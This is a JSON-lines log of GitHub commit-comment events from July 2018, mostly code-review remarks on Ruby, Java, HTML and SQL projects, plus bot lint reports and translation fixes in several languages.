{"id":"7998917466","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789239,"position":10,"line":10,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:16:30Z","updated_at":"2018-07-21T17:16:30Z","author_association":"NONE","body":"замечание по всему файлу и по всему остальному коду\r\nв этом файле используются \"табы\"\r\nнужно настроить редактор на отступ ровно в 2 проблела, именно так принято в ruby\r\nпричем, именно пробела, а не таба, т.е. должна быть замена табов на пробелы, т.н. soft tabs\r\nнайдите в интернете как сделать soft tabs для вашего редактора"}},"created_at":"2018-07-21T17:16:30Z"}
{"id":"7998917646","type":"CommitCommentEvent","actor":{"login":"oomek"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29789240,"position":14,"line":177,"path":"src/fe_listbox.cpp","commit_id":"62c2a6e100194daf663c0ede39833172eb65eb1e","created_at":"2018-07-21T17:16:38Z","updated_at":"2018-07-21T17:16:38Z","author_association":"CONTRIBUTOR","body":"This 2 lines introduced a bug explained in the following issue\r\nhttps://github.com/mickelson/attract/issues/459\r\nIt can be commented as a quick fix"}},"created_at":"2018-07-21T17:16:38Z"}
{"id":"7998918124","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789242,"position":7,"line":7,"path":"Lesson2/l2_task4_fill_hash_vowel.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:17:01Z","updated_at":"2018-07-21T17:17:01Z","author_association":"NONE","body":"здесь лишние пробелы между словами"}},"created_at":"2018-07-21T17:17:01Z"}
{"id":"7998918809","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789244,"position":7,"line":7,"path":"Lesson2/l2_task4_fill_hash_vowel.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:17:32Z","updated_at":"2018-07-21T17:17:32Z","author_association":"NONE","body":"здесь и далее:\r\n\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```ruby\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```"}},"created_at":"2018-07-21T17:17:32Z"}
{"id":"7998918930","type":"CommitCommentEvent","actor":{"login":"vibssh"},"repo":{"name":"vibssh/ChoreApp"},"payload":{"comment":{"id":29789246,"position":null,"line":null,"path":null,"commit_id":"2e0dc0db82e0f280f1b4f7a2102c041adaf1b3a1","created_at":"2018-07-21T17:17:37Z","updated_at":"2018-07-21T17:17:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Install NGBootStrap](https://trello.com/c/pKVsZTtx/4-install-ngbootstrap)"}},"created_at":"2018-07-21T17:17:37Z"}
{"id":"7998919185","type":"CommitCommentEvent","actor":{"login":"oomek"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29789249,"position":14,"line":177,"path":"src/fe_listbox.cpp","commit_id":"62c2a6e100194daf663c0ede39833172eb65eb1e","created_at":"2018-07-21T17:17:47Z","updated_at":"2018-07-21T17:17:47Z","author_association":"CONTRIBUTOR","body":"This 2 lines introduced a bug explained in the following issue\r\nhttps://github.com/mickelson/attract/issues/459\r\nIt can be commented as a quick fix"}},"created_at":"2018-07-21T17:17:47Z"}
{"id":"7998919187","type":"CommitCommentEvent","actor":{"login":"vibssh"},"repo":{"name":"vibssh/ChoreApp"},"payload":{"comment":{"id":29789250,"position":null,"line":null,"path":null,"commit_id":"2e0dc0db82e0f280f1b4f7a2102c041adaf1b3a1","created_at":"2018-07-21T17:17:47Z","updated_at":"2018-07-21T17:17:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Install NGBootStrap](https://trello.com/c/pKVsZTtx/4-install-ngbootstrap)"}},"created_at":"2018-07-21T17:17:47Z"}
{"id":"7998919543","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29789251,"position":null,"line":null,"path":null,"commit_id":"ccb265b0a529d52b5e95b78bb842224af1071111","created_at":"2018-07-21T17:18:05Z","updated_at":"2018-07-21T17:18:05Z","author_association":"NONE","body":"eww not listing engine > gun > turret > drone > fighter like the base game"}},"created_at":"2018-07-21T17:18:05Z"}
{"id":"7998920138","type":"CommitCommentEvent","actor":{"login":"ridouchire"},"repo":{"name":"MomozonoNanami/LandingPageTemplates"},"payload":{"comment":{"id":29789252,"position":2,"line":4,"path":"index.html","commit_id":"c64c21a29217a8f4ae7d38649375d8df44b7a675","created_at":"2018-07-21T17:18:32Z","updated_at":"2018-07-21T17:18:32Z","author_association":"NONE","body":"Задай viewport для мобильных устройств, чтобы во всяких ебаных стандартных браузерах андроида оно выглядело нормально.\r\n\r\nПримерно так задать:\r\n``<meta name=\"viewport\" content=\"width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0\"/>``"}},"created_at":"2018-07-21T17:18:32Z"}
{"id":"7998920981","type":"CommitCommentEvent","actor":{"login":"SwatiNH"},"repo":{"name":"SwatiNH/Terrorist-Group-Prediction"},"payload":{"comment":{"id":29789253,"position":null,"line":null,"path":null,"commit_id":"713972a6eee836f24859193ca78197b2c8042901","created_at":"2018-07-21T17:18:59Z","updated_at":"2018-07-21T17:18:59Z","author_association":"OWNER","body":"Preprocessing data is part of the model building code"}},"created_at":"2018-07-21T17:18:59Z"}
{"id":"7998922266","type":"CommitCommentEvent","actor":{"login":"luiscolorado"},"repo":{"name":"OfficeDev/VBA-content"},"payload":{"comment":{"id":29789254,"position":null,"line":null,"path":null,"commit_id":"e18a1029ed0460d8d218be93b97749b636b6404a","created_at":"2018-07-21T17:19:28Z","updated_at":"2018-07-21T17:19:28Z","author_association":"NONE","body":"Excel's Macro recorder generates this method when sorting a table generated by ShowDetail. Here are the parameters generated:\r\n\r\n.Sort.SortFields.Add2 _\r\n            Key:=Range(\"Table2[[#All],[Start]]\"), SortOn:=xlSortOnValues, Order:= _\r\n            xlAscending, DataOption:=xlSortNormal"}},"created_at":"2018-07-21T17:19:28Z"}
{"id":"7998922645","type":"CommitCommentEvent","actor":{"login":"milennio"},"repo":{"name":"milennio/myPVT"},"payload":{"comment":{"id":29789255,"position":null,"line":null,"path":null,"commit_id":"5569e912651df110ad781a710b8dfb9a4d44e0c1","created_at":"2018-07-21T17:19:45Z","updated_at":"2018-07-21T17:19:45Z","author_association":"OWNER","body":"В отчаянии рубанула с плеча - и снесла к чертовой матери свой реп.\r\nГоворить о разумности данного поступка уже бессмысленно.\r\nКек."}},"created_at":"2018-07-21T17:19:45Z"}
{"id":"7998922746","type":"CommitCommentEvent","actor":{"login":"ridouchire"},"repo":{"name":"MomozonoNanami/LandingPageTemplates"},"payload":{"comment":{"id":29789256,"position":21,"line":22,"path":"index.html","commit_id":"c64c21a29217a8f4ae7d38649375d8df44b7a675","created_at":"2018-07-21T17:19:52Z","updated_at":"2018-07-21T17:19:52Z","author_association":"NONE","body":"Если у тебя bootstrap для именования классов и идентификаторов использует дефис - то и используй его вместо нижнего подчёркивания.\r\n``padd-r-15`` соответственно."}},"created_at":"2018-07-21T17:19:52Z"}
{"id":"7998922919","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789257,"position":25,"line":25,"path":"Lesson2/l2_task5_date_number.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:20:00Z","updated_at":"2018-07-21T17:20:00Z","author_association":"NONE","body":"табы, ненужные пробелы, несколько команд в строке, однобуквенные переменные (подробности по всем замечаниям есть выше)"}},"created_at":"2018-07-21T17:20:00Z"}
{"id":"7998923467","type":"CommitCommentEvent","actor":{"login":"gnu-lorien"},"repo":{"name":"gnu-lorien/yorick"},"payload":{"comment":{"id":29789258,"position":null,"line":null,"path":null,"commit_id":"c084f459cb035b63e177baf8fd306141dc756b13","created_at":"2018-07-21T17:20:24Z","updated_at":"2018-07-21T17:20:24Z","author_association":"OWNER","body":"Fixes #183 "}},"created_at":"2018-07-21T17:20:24Z"}
{"id":"7998923763","type":"CommitCommentEvent","actor":{"login":"ridouchire"},"repo":{"name":"MomozonoNanami/LandingPageTemplates"},"payload":{"comment":{"id":29789259,"position":29,"line":30,"path":"index.html","commit_id":"c64c21a29217a8f4ae7d38649375d8df44b7a675","created_at":"2018-07-21T17:20:37Z","updated_at":"2018-07-21T17:20:37Z","author_association":"NONE","body":"Опечатка в пути или у тебя есть якорь с точкой в имени?"}},"created_at":"2018-07-21T17:20:37Z"}
{"id":"7998924321","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789260,"position":20,"line":20,"path":"Lesson2/l2_task5_date_number.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:21:04Z","updated_at":"2018-07-21T17:21:04Z","author_association":"NONE","body":"в руби рекомендуется использовать встроенные итераторы семейства `each`, вместо петлей `loop`, `while` или `for` там, где это приемлимо и удобно\r\n\r\nпосмотрите внимательно на методы `each`,  `each_with_index` и `each.with_index(n)` и попробуйте воспользоваться тем, который здесь больше подходит\r\n"}},"created_at":"2018-07-21T17:21:04Z"}
{"id":"7998935472","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789293,"position":32,"line":32,"path":"Lesson2/l2_task6_products.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:29:39Z","updated_at":"2018-07-21T17:29:39Z","author_association":"NONE","body":"по большому счету эти переменные вообще не нужны, т.к. использутся только один раз\r\nт.е. можно просто в следующей строке обратиться сразу к хешу и перемножить полученные из него значения, минуя дополнительных инициализаций в 31 и 32 строках"}},"created_at":"2018-07-21T17:29:39Z"}
{"id":"7998936185","type":"CommitCommentEvent","actor":{"login":"echristopher2000"},"repo":{"name":"echristopher2000/github-slideshow"},"payload":{"comment":{"id":29789296,"position":null,"line":null,"path":null,"commit_id":"8133ec3ccbb4a04c033e4fe9ae5df7c4473693f8","created_at":"2018-07-21T17:30:12Z","updated_at":"2018-07-21T17:30:12Z","author_association":"OWNER","body":"add new file"}},"created_at":"2018-07-21T17:30:12Z"}
{"id":"7998936946","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789299,"position":38,"line":38,"path":"Lesson2/l2_task6_products.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:30:47Z","updated_at":"2018-07-21T17:30:47Z","author_association":"NONE","body":"ненужная пустая строка"}},"created_at":"2018-07-21T17:30:47Z"}
{"id":"7998937076","type":"CommitCommentEvent","actor":{"login":"MrR3DH3T"},"repo":{"name":"MrR3DH3T/what-sexploit"},"payload":{"comment":{"id":29789300,"position":null,"line":null,"path":null,"commit_id":"b4fc95e888e4f4d76f2f8536dbfac07bda22d559","created_at":"2018-07-21T17:30:52Z","updated_at":"2018-07-21T17:30:52Z","author_association":"OWNER","body":"Ga guna"}},"created_at":"2018-07-21T17:30:52Z"}
{"id":"7998937855","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"jsettlers/settlers-remake"},"payload":{"comment":{"id":29789302,"position":5,"line":32,"path":"go.graphics.swing/src/main/java/go/graphics/swing/opengl/LWJGLDebugOutput.java","commit_id":"92e8fc9cce02d8c800d795decbd8cc0a8bc5c7a3","created_at":"2018-07-21T17:31:23Z","updated_at":"2018-07-21T17:31:23Z","author_association":"CONTRIBUTOR","body":"If you are afraid of the many 0, you can write it as: 1_000_000 ;-)"}},"created_at":"2018-07-21T17:31:23Z"}
{"id":"7998938014","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29789303,"position":null,"line":null,"path":null,"commit_id":"3a0dd086338406e6a33843074f46613eb12b6517","created_at":"2018-07-21T17:31:31Z","updated_at":"2018-07-21T17:31:31Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-327](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-327).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-327-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-21T17:31:31Z"}
{"id":"7998938485","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789304,"position":35,"line":35,"path":"Lesson2/l2_task6_products.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:31:52Z","updated_at":"2018-07-21T17:31:52Z","author_association":"NONE","body":"лучше писать все \"в одном стиле\"\r\nлибо все через конкатенацию, либо все через экстраполяцию\r\n"}},"created_at":"2018-07-21T17:31:52Z"}
{"id":"7998938556","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29789305,"position":null,"line":null,"path":null,"commit_id":"735915cb201ee9160760f14f1aa12eeffb57af1b","created_at":"2018-07-21T17:31:56Z","updated_at":"2018-07-21T17:31:56Z","author_association":"OWNER","body":"## Detekt report:\n❌\n```\nMagicNumber - [num] at /home/travis/build/tarek360/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\nMagicNumber - [<anonymous>] at /home/travis/build/tarek360/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n```"}},"created_at":"2018-07-21T17:31:56Z"}
{"id":"7998938601","type":"CommitCommentEvent","actor":{"login":"Math2128"},"repo":{"name":"Anuken/Mindustry"},"payload":{"comment":{"id":29789306,"position":null,"line":null,"path":null,"commit_id":"594c5918d57c796a53886f29d74c9fcafb452a4b","created_at":"2018-07-21T17:31:57Z","updated_at":"2018-07-21T17:31:57Z","author_association":"NONE","body":"Lane 276: remove space between \"personnalisées\" and \"(custum build)\"\r\nLane 278: \"automatique\" takes an s. (automatiques)\r\nLane 284: Sauvegarde en cours...*\r\nLane 289: Aléatoire* (A)\r\nLane 290: Possède* (Øz)\r\nLane 294: Génération* (é-é)\r\nLane 300: I think \"Élévation\" would be better.\r\nLane 301: Sauvegardé !* (r)\r\nLane 302: Not \"Vous\", but \"Votre\"\r\nI think that is it :)"}},"created_at":"2018-07-21T17:31:57Z"}
{"id":"7998939187","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29789310,"position":null,"line":null,"path":null,"commit_id":"32830cf965a362cd029dbaf2edfc5693ee31f029","created_at":"2018-07-21T17:32:27Z","updated_at":"2018-07-21T17:32:27Z","author_association":"OWNER","body":"## Detekt report:\n❌\n```\nMagicNumber - [num] at /home/travis/build/tarek360/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\nMagicNumber - [<anonymous>] at /home/travis/build/tarek360/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n```"}},"created_at":"2018-07-21T17:32:27Z"}
{"id":"7998941749","type":"CommitCommentEvent","actor":{"login":"jonorthwash"},"repo":{"name":"apertium/apertium-kaz"},"payload":{"comment":{"id":29789314,"position":8,"line":631,"path":"apertium-kaz.kaz.lexc","commit_id":"ac73f9e81e2a10c269e8ea817e23ae2b5c61950a","created_at":"2018-07-21T17:34:39Z","updated_at":"2018-07-21T17:34:39Z","author_association":"MEMBER","body":"Shouldn't this be after `<subst>`?"}},"created_at":"2018-07-21T17:34:39Z"}
{"id":"7998942238","type":"CommitCommentEvent","actor":{"login":"jonorthwash"},"repo":{"name":"apertium/apertium-kaz"},"payload":{"comment":{"id":29789315,"position":8,"line":631,"path":"apertium-kaz.kaz.lexc","commit_id":"ac73f9e81e2a10c269e8ea817e23ae2b5c61950a","created_at":"2018-07-21T17:35:05Z","updated_at":"2018-07-21T17:35:05Z","author_association":"MEMBER","body":"@IlnarSelimcan, I'm not sure putting cases after `<attr>` is consistent with our general approach.  @ftyers, what do you think?"}},"created_at":"2018-07-21T17:35:05Z"}
{"id":"7998943327","type":"CommitCommentEvent","actor":{"login":"aspenoeld"},"repo":{"name":"aspenoeld/aspenoeld.github.io"},"payload":{"comment":{"id":29789316,"position":null,"line":null,"path":null,"commit_id":"cbc383affa4f6b3f0b958bdbfe1908a94e2d11c7","created_at":"2018-07-21T17:35:54Z","updated_at":"2018-07-21T17:35:54Z","author_association":"OWNER","body":"These are approved changes, extra edits"}},"created_at":"2018-07-21T17:35:54Z"}
{"id":"7998943883","type":"CommitCommentEvent","actor":{"login":"wishdasher"},"repo":{"name":"Khan/wonder-blocks"},"payload":{"comment":{"id":29789317,"position":null,"line":null,"path":null,"commit_id":"1fae646cc2cbb00635bf1573df1367b6af884131","created_at":"2018-07-21T17:36:18Z","updated_at":"2018-07-21T17:36:18Z","author_association":"MEMBER","body":"In `packages/wonder-blocks-modal/components/modal-panel.js`, I think it would make sense to move line 150 `{this.maybeRenderCloseButton()}`, which is `position: absolute` anyways, to above `{titleBar}`. This creates a more natural tab navigation order in the modal."}},"created_at":"2018-07-21T17:36:18Z"}
{"id":"7998944942","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29789318,"position":null,"line":null,"path":null,"commit_id":"4ae84683c0fc9802f4d04bd7bc3d5e319fd22ad4","created_at":"2018-07-21T17:37:09Z","updated_at":"2018-07-21T17:37:09Z","author_association":"COLLABORATOR","body":"Puzzle `1193-ee91f3f9` discovered in   [`src/main/resources/xsl/profile.xsl`](  https://github.com/zerocracy/farm/blob/master/src/main/resources/xsl/profile.xsl)   and submitted as #1458. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-21T17:37:09Z"}
{"id":"7998946192","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789319,"position":null,"line":null,"path":null,"commit_id":"0f8dd6ca4526f2fff095613350ae4ed7dcf654d8","created_at":"2018-07-21T17:38:08Z","updated_at":"2018-07-21T17:38:08Z","author_association":"COLLABORATOR","body":"If you want to include images, I personally prefer to include the stripped images. This means:\r\n\r\n* Remove all `sodipodi:` and `inkscape:` attributes\r\n* Remove all ids\r\n* Don't wrap text in <tspan>s\r\n* Replace long styles, e.g.: `stroke:none;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1` => `stroke:none;`. \r\n* Remove unneded styles like `letter-spacing:0px;word-spacing:0px;`\r\n* Pull common styles up to the <g>, like `font-style:normal;font-weight:normal;font-size:1.98437488px;line-height:125%;`\r\n\r\nThe inkscape SVGs are good for editing with Inkscape, but other programs will have problems with them if they get too complex (should not be an issue here though)."}},"created_at":"2018-07-21T17:38:08Z"}
{"id":"7998947417","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29789321,"position":null,"line":null,"path":null,"commit_id":"a5a6535273eb8a8131e886e6f643a05720abd45f","created_at":"2018-07-21T17:39:09Z","updated_at":"2018-07-21T17:39:09Z","author_association":"COLLABORATOR","body":"Rollbackeado. Ya vuelve a andar"}},"created_at":"2018-07-21T17:39:09Z"}
{"id":"7998947497","type":"CommitCommentEvent","actor":{"login":"robertramey"},"repo":{"name":"boostorg/serialization"},"payload":{"comment":{"id":29789322,"position":null,"line":null,"path":null,"commit_id":"519a5280f5be125a5ccd709c706f39fbef5f451e","created_at":"2018-07-21T17:39:14Z","updated_at":"2018-07-21T17:39:14Z","author_association":"MEMBER","body":"I'm really mystified as to how this aspect of git hub works.\r\n\r\nThis looks correct and I would like to merge it.  But I don't expect what I expect to see.  I expect to see a pull request which I can just merge into the develop branch of the main project.  But I don't see that here.  I don't know what to do with this.\r\n\r\nIt's looks like this is placed into the main serialization project.  Again, I don't see how this can (or should) happen.\r\n\r\nAny explanation appreciated.\r\n"}},"created_at":"2018-07-21T17:39:14Z"}
{"id":"7998948386","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789326,"position":27,"line":109,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/gui/PTAssistantPaintVisitor.java","commit_id":"0ed0fce3367655d968fc3abe2033ed96deaff2ce","created_at":"2018-07-21T17:39:57Z","updated_at":"2018-07-21T17:39:57Z","author_association":"COLLABORATOR","body":"If you have so many roles, put the roles in a constant, like:\r\n```\r\nprivate final static Set<String> PUBLIC_TRANSPORT_NODE_ROLES = new HashSet<>(Arrays.asList(\"stop\", ...));\r\n```"}},"created_at":"2018-07-21T17:39:57Z"}
{"id":"7998949009","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789327,"position":39,"line":121,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/gui/PTAssistantPaintVisitor.java","commit_id":"0ed0fce3367655d968fc3abe2033ed96deaff2ce","created_at":"2018-07-21T17:40:25Z","updated_at":"2018-07-21T17:40:25Z","author_association":"COLLABORATOR","body":"Internationalize this String"}},"created_at":"2018-07-21T17:40:25Z"}
{"id":"7998950101","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29789329,"position":null,"line":null,"path":null,"commit_id":"6c7ed6275f99993ec6747973763eae8702b07ca7","created_at":"2018-07-21T17:41:20Z","updated_at":"2018-07-21T17:41:20Z","author_association":"OWNER","body":"Stefan you fixed it!!!\r\n\r\nNo crashes and green in 8k games!!! Thanks!"}},"created_at":"2018-07-21T17:41:20Z"}
{"id":"7998951432","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29789330,"position":null,"line":null,"path":null,"commit_id":"4bb3e1ace7fd39b3dff5adc2fadf1da2a0fd68a0","created_at":"2018-07-21T17:42:24Z","updated_at":"2018-07-21T17:42:24Z","author_association":"NONE","body":"That version is running good! a fast STC pass!\r\nAnd no crashes anymore!\r\nGood luck for LTC."}},"created_at":"2018-07-21T17:42:24Z"}
{"id":"7998953503","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789333,"position":34,"line":116,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/gui/PTAssistantPaintVisitor.java","commit_id":"0ed0fce3367655d968fc3abe2033ed96deaff2ce","created_at":"2018-07-21T17:44:03Z","updated_at":"2018-07-21T17:44:03Z","author_association":"COLLABORATOR","body":"Move this if/elseif/else to a separate method:\r\n```\r\nif (relation.hasKey(\"ref\")) {\r\n   return relation.get(\"ref\");\r\n} ...\r\n```"}},"created_at":"2018-07-21T17:44:03Z"}
{"id":"7998953548","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29789334,"position":9,"line":3691,"path":"dietpi/dietpi-software","commit_id":"37d3cb6dbc7c157e0e5a82eaf1a80bea2c384e0c","created_at":"2018-07-21T17:44:05Z","updated_at":"2018-07-21T17:44:05Z","author_association":"OWNER","body":"@MichaIng \r\n\r\n> that you had another (broken/not fully purged) PHP installation. \r\n\r\nYep, wasn't sure what the issue was, so for the sake of being able to test, i made the quick change.\r\n\r\nI believe you have a PR which reverts this already?"}},"created_at":"2018-07-21T17:44:05Z"}
{"id":"7998954556","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789335,"position":31,"line":113,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/gui/PTAssistantPaintVisitor.java","commit_id":"0ed0fce3367655d968fc3abe2033ed96deaff2ce","created_at":"2018-07-21T17:44:50Z","updated_at":"2018-07-21T17:44:50Z","author_association":"COLLABORATOR","body":"Try to use `computeIfPresent` and `computeIfAbsent` (in that order ;-))"}},"created_at":"2018-07-21T17:44:50Z"}
{"id":"7998955316","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789339,"position":4,"line":14,"path":"FinalProject/pom.xml","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:45:24Z","updated_at":"2018-07-21T17:45:24Z","author_association":"OWNER","body":"Thêm security vào maven\r\nPhiên Bản 4.0.3 RELLEASE"}},"created_at":"2018-07-21T17:45:24Z"}
{"id":"7998955560","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789340,"position":59,"line":132,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/gui/PTAssistantPaintVisitor.java","commit_id":"0ed0fce3367655d968fc3abe2033ed96deaff2ce","created_at":"2018-07-21T17:45:36Z","updated_at":"2018-07-21T17:45:36Z","author_association":"COLLABORATOR","body":"Open a bug report dialog instead of logging the exception. A null pointer exception should never happen, if it happens there is a serious problem with your program."}},"created_at":"2018-07-21T17:45:36Z"}
{"id":"7998955896","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789342,"position":12,"line":84,"path":"FinalProject/pom.xml","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:45:52Z","updated_at":"2018-07-21T17:45:52Z","author_association":"OWNER","body":"Phần Dependencies của security"}},"created_at":"2018-07-21T17:45:52Z"}
{"id":"7998956031","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29789343,"position":3,"line":48,"path":"sql/schema.sql","commit_id":"4aa365d82c70a8c7b2e48f7f86f716a7530f0bdd","created_at":"2018-07-21T17:45:58Z","updated_at":"2018-07-21T17:45:58Z","author_association":"COLLABORATOR","body":"I think we talked about this previously, the username should NOT be the primary key. \r\nA primary key in a sql database is a unique value, meaning only one username can exist in this whole roles table. \r\n\r\nWhat about a user who has several tickets open, shouldnt that user have different roles on each of those tickets? What would be better is a primary key of two columns, a username and a ticket_id. Because a user for a specific ticket will only have 1 role. Does that make sense? \r\n\r\nhttps://dba.stackexchange.com/questions/57548/how-to-set-up-multiple-fields-as-primary-key-in-mysql"}},"created_at":"2018-07-21T17:45:58Z"}
{"id":"7998956425","type":"CommitCommentEvent","actor":{"login":"michaelzangl"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29789345,"position":22,"line":24,"path":"src/org/openstreetmap/josm/plugins/pt_assistant/PTAssistantPluginPreferences.java","commit_id":"1885c26c0a2a93fd6c1c010134695ce52dec0b6b","created_at":"2018-07-21T17:46:17Z","updated_at":"2018-07-21T17:46:17Z","author_association":"COLLABORATOR","body":"... final ..."}},"created_at":"2018-07-21T17:46:17Z"}
{"id":"7998957001","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789352,"position":37,"line":125,"path":"FinalProject/pom.xml","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:46:44Z","updated_at":"2018-07-21T17:46:44Z","author_association":"OWNER","body":"JSTL: Example <c:if , <c:urf... Lý do sử dụng : dùng chung vs Security để hiện lỗi và làm đường dẫn cho logout"}},"created_at":"2018-07-21T17:46:44Z"}
{"id":"7998957531","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29789353,"position":5,"line":49,"path":"sql/schema.sql","commit_id":"4aa365d82c70a8c7b2e48f7f86f716a7530f0bdd","created_at":"2018-07-21T17:47:09Z","updated_at":"2018-07-21T17:47:09Z","author_association":"COLLABORATOR","body":"You dont need 3 different columns of roles. You can just have one column that stores a role as an integer\r\n(1 = ViewPermission, 2 = EditPermission, 3 = ...) and use the enums in python to interpret those integers"}},"created_at":"2018-07-21T17:47:09Z"}
{"id":"7998957636","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29789354,"position":19,"line":39,"path":"FinalProject/src/main/java/com/dxc/controller/IndexController.java","commit_id":"b758b8e7c5bb10dd78e0ae287cba1003323364ba","created_at":"2018-07-21T17:47:14Z","updated_at":"2018-07-21T17:47:14Z","author_association":"OWNER","body":"Thêm cái @RequestParam(value = \"error\", required = false) final String error để cho security nhận lỗi"}},"created_at":"2018-07-21T17:47:14Z"}
